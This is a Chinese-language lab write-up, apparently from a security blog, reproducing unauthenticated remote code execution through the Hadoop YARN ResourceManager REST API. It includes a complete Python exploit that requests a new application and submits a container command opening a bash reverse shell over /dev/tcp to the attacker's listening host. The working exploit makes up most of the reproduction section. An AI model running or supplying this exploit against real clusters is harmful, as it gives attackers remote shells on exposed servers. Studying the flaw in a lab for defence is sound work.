Hadoop YARN ResourceManager 未授权访问

Hadoop YARN ResourceManager 未授权访问

原理

参考 [http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf](http://archive.hack.lu/2016/Wavestone - Hack.lu 2016 - Hadoop safari - Hunting for vulnerabilities - v1.0.pdf)

漏洞复现

环境启动后,访问http://192.168.44.132:8088即可看到Hadoop YARN ResourceManager WebUI页面。

image-20210811153137527

通过REST API提交任务执行
申请新的application:http://192.168.44.132:8088/ws/v1/cluster/apps/new-application

image-20210811153155733

更多的提交方法可参考:

https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html

本地监听9999端口,等待反弹shell连接

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.44.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)

然后运行exp脚本,反弹shell,成功获取shell

image-20210811153733797

0%